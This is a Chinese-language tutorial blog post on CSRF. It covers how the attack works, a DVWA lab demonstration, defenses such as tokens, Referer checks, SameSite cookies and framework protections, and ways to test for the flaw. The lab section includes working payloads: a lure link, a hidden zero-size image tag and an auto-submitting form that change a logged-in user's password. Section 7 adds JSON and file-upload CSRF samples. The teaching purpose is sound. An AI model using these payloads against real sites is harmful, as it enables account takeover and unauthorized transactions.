当前位置: 首页 > news >正文

网安系列【10】之深入浅出CSRF攻击:从原理到实战(DVWA靶场演示)

文章目录

  • 一 初识CSRF
  • 二 CSRF攻击的工作原理
  • 三 DVWA环境中的CSRF演示
    • 3.1 DVWA环境搭建
    • 3.2 正常修改密码流程
    • 3.3 构造恶意链接
    • 3.4 自动化攻击演示
    • 四 CSRF与XSS的区别
  • 五 CSRF攻击的防御措施
    • 5.1 使用CSRF Token
    • 5.2 验证Referer头部
    • 5.3 SameSite Cookie属性
    • 5.4 双重验证
  • 六、实际开发中的CSRF防护
    • 6.1 Django中的CSRF防护
    • 6.2 Laravel中的CSRF防护
    • 6.3 Spring Security中的CSRF防护
  • 七、CSRF攻击的高级变种
    • 7.1 JSON CSRF
    • 7.2 文件上传CSRF
  • 八、CSRF攻击的检测与测试
    • 8.1 手动测试步骤
    • 8.2 使用工具测试

一 初识CSRF

  • CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的Web安全漏洞,它利用了Web应用程序对用户浏览器的信任机制。简单来说,就是攻击者诱骗受害者在登录受信任网站的情况下,访问恶意网站或点击恶意链接,从而在不知情的情况下以受害者身份执行非预期的操作。

  • 想象这样一个场景:你登录了网上银行后没有退出,然后不小心点击了一个朋友发来的"搞笑图片"链接。这个链接实际上暗藏玄机,它可能悄悄地向银行服务器发送转账请求,而银行认为这是你本人操作的,因为你的登录状态仍然有效。这就是CSRF攻击的典型例子。

二 CSRF攻击的工作原理

  • 要理解CSRF,需要了解几个关键概念:
  1. Cookie的身份验证机制:网站通常使用Cookie来维持用户的登录状态
  2. 浏览器的同源策略:限制不同源的脚本获取或修改其他源的资源
  3. 请求的自动携带:浏览器会自动在请求中携带当前域的Cookie

CSRF攻击之所以能成功,是因为:

  • 用户已经登录了目标网站(如银行、社交网络)
  • 目标网站仅依赖Cookie进行身份验证
  • 攻击者可以预测或知道请求的参数
  • 用户在没有登出目标网站的情况下访问了恶意页面

三 DVWA环境中的CSRF演示

  • 通过DVWA(Damn Vulnerable Web Application)安全演练的靶场来实际演示CSRF攻击。

3.1 DVWA环境搭建

  • 确保已经安装了DVWA(可以通过XAMPP、Docker等方式安装),并将安全级别设置为"low":
  1. 登录DVWA(默认账号admin/password)
  2. 点击"DVWA Security",选择安全级别为"Low"
  3. 进入"CSRF"模块

3.2 正常修改密码流程

  • 在DVWA的CSRF模块中,有一个简单的密码修改功能。正常流程如下:
    http://ip:port/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#
    
  • 这个URL会触发密码修改操作,将密码改为"123456"。

3.3 构造恶意链接

  • 攻击者可以构造这样一个链接,并诱骗已登录DVWA的用户点击:
    <a href="http://ip:port/vulnerabilities/csrf/?password_new=hacked&password_conf=hacked&Change=Change#">点击领取免费礼品卡!</a>
    
  • 或者更隐蔽的方式,使用图片标签:
    <img src="http://ip:port/vulnerabilities/csrf/?password_new=hacked&password_conf=hacked&Change=Change#" width="0" height="0">
    
  • 当用户点击链接或加载图片时,密码就被悄无声息地修改了。

3.4 自动化攻击演示

  • 更高级的攻击可以通过自动提交表单实现:
    <html><body><form action="http://192.168.1.21:4280/vulnerabilities/csrf/" method="GET"><input type="hidden" name="password_new" value="hacked"><input type="hidden" name="password_conf" value="hacked"><input type="hidden" name="Change" value="Change"></form><script>document.forms[0].submit();</script></body>
    </html>
    
  • 当用户访问这个页面时,表单会自动提交,完成密码修改。

四 CSRF与XSS的区别

  • 初学者常常混淆CSRF和XSS(跨站脚本攻击),它们确实有一些相似之处,但本质不同:
特性CSRFXSS
攻击目标利用用户的身份执行特定操作窃取用户数据或会话信息
攻击方式需要用户点击链接或访问页面需要向页面注入恶意脚本
同源策略利用浏览器对目标网站的同源策略绕过直接违反同源策略
防御重点验证请求来源过滤用户输入和输出编码

五 CSRF攻击的防御措施

  • 了解了CSRF的攻击原理后,我们来看看如何防御:

5.1 使用CSRF Token

最有效的防御方法是使用CSRF Token。它的工作原理是:

  1. 服务器生成一个随机Token,存储在session中
  2. 将Token嵌入表单或请求参数中
  3. 提交请求时,服务器验证Token是否匹配
  • DVWA在"high"安全级别下就实现了CSRF Token:
// 生成Token
if( isset( $_SESSION[ 'session_token' ] ) ) {$session_token = $_SESSION[ 'session_token' ];
} else {generateSessionToken();
}// 验证Token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

5.2 验证Referer头部

  • 检查HTTP请求的Referer头部,确保请求来自合法的源:
if (strpos($_SERVER['HTTP_REFERER'], 'https://yourdomain.com') !== 0) {die("非法请求来源");
}

5.3 SameSite Cookie属性

  • 设置Cookie的SameSite属性可以限制第三方Cookie的发送:
Set-Cookie: sessionid=xxxx; SameSite=Strict; Secure; HttpOnly

SameSite有三种模式:

  • Strict:完全禁止第三方Cookie
  • Lax:宽松模式,允许部分安全请求(如导航)携带Cookie
  • None:关闭SameSite保护(需要同时设置Secure)

5.4 双重验证

  • 对于敏感操作(如转账、修改密码),要求用户进行二次验证(如输入密码、短信验证码等)。

六、实际开发中的CSRF防护

  • 在实际开发中,现代框架通常内置了CSRF防护:

6.1 Django中的CSRF防护

# 模板中
<form method="post">{% csrf_token %}...
</form># 视图中
from django.views.decorators.csrf import csrf_protect@csrf_protect
def my_view(request):# 视图逻辑

6.2 Laravel中的CSRF防护

// 表单中
<form method="POST" action="/profile">@csrf...
</form>// 验证
Route::post('profile', function () {// 请求会自动验证CSRF token
});

6.3 Spring Security中的CSRF防护

// 默认启用,只需在表单中添加
<input type="hidden" name="${_csrf.parameterName}" value="${_csrf.token}"/>

七、CSRF攻击的高级变种

  • 随着防御措施的普及,攻击者也开发出了一些高级CSRF技术:

7.1 JSON CSRF

  • 当API仅依赖Cookie认证且接受JSONP或宽松的CORS策略时,可能通过构造恶意页面发起JSON请求:
<script>var xhr = new XMLHttpRequest();xhr.open("POST", "https://api.example.com/transfer", true);xhr.withCredentials = true;xhr.setRequestHeader("Content-Type", "application/json");xhr.send('{"amount":1000,"to":"attacker"}');
</script>
  • 防御方法:严格设置CORS,拒绝非预期的Content-Type。

7.2 文件上传CSRF

  • 如果文件上传接口没有CSRF防护,可能被利用来上传恶意文件:
<form action="https://example.com/upload" method="POST" enctype="multipart/form-data"><input type="file" name="file"/><input type="hidden" name="token" value="malicious"/>
</form>
<script>document.forms[0].submit();</script>

八、CSRF攻击的检测与测试

  • 作为开发者,如何测试自己的应用是否存在CSRF漏洞?

8.1 手动测试步骤

  1. 登录目标应用,获取有效会话
  2. 在另一个浏览器标签中打开恶意页面
  3. 检查是否能在用户不知情的情况下执行操作
  4. 检查关键操作是否有CSRF Token等防护

8.2 使用工具测试

  • Burp Suite:使用CSRF PoC生成器
  • OWASP ZAP:自动扫描CSRF漏洞
  • CSRF Tester:Firefox插件
http://www.dtcms.com/a/268912.html

相关文章:

  • 商城小程序的UI设计都有哪些风格
  • 磷酸镧:多功能稀土材料,助力未来科技
  • 如何排查服务器中已经存在的后门程序?
  • SOC估算综述:电池管理中的关键挑战与前沿技术
  • 【数据结构】第七弹——Priority Queue
  • 苹果开源 DiffuCoder :用于代码生成的掩码扩散模型
  • 深度学习机器学习比较
  • 安卓10.0系统修改定制化____系列 ROM解打包 修改 讲解 与安卓9文件差异
  • 【Godot4】正则表达式总结与测试
  • VSCODE创建JS项目
  • 第二届虚拟现实、图像和信号处理国际学术会议(VRISP 2025)
  • 网络安全之内网渗透实操
  • SpringBoot-Freemarker导出word
  • 基于pycharm,python,flask,uniapp,sklearn机器学习,orm,mysql,在线恶意流量检测系统开发
  • python数据结构与算法-递归
  • 当“漏洞”成为双刃剑——合法披露与非法交易的生死线在哪里?
  • Kafka 消费者组再平衡优化实践指南
  • HTTP 重定向
  • python 数据分析 单细胞测序数据分析 相关的图表,常见于肿瘤免疫微环境、细胞亚群功能研究 ,各图表类型及逻辑关系如下
  • Python实现文件夹中文件名与Excel中存在的文件名进行对比,并进行删除操作
  • 护照阅读器在酒店应用场景
  • 【机器学习笔记 Ⅱ】8 多标签和多类别
  • 2. 你可以说一下 http 版本的发展过程吗
  • 【PTA数据结构 | C语言版】计算1~n与1~m每一项相互乘积的和
  • ArcGIS 水文分析升级:基于深度学习的流域洪水演进过程模拟
  • windows安装python环境以及对应编辑器的详细流程
  • 告别数据不一致!Spring Boot+Canal+RocketMQ实现精准的MySQL变更监听
  • 【flutter 在最新版本中已经弃用了传统的 apply from 方式引入 Gradle 插件】
  • 源哈希(sh)解析
  • 如果让计算机理解人类语言- One-hot 编码(One-hot Encoding,1950s)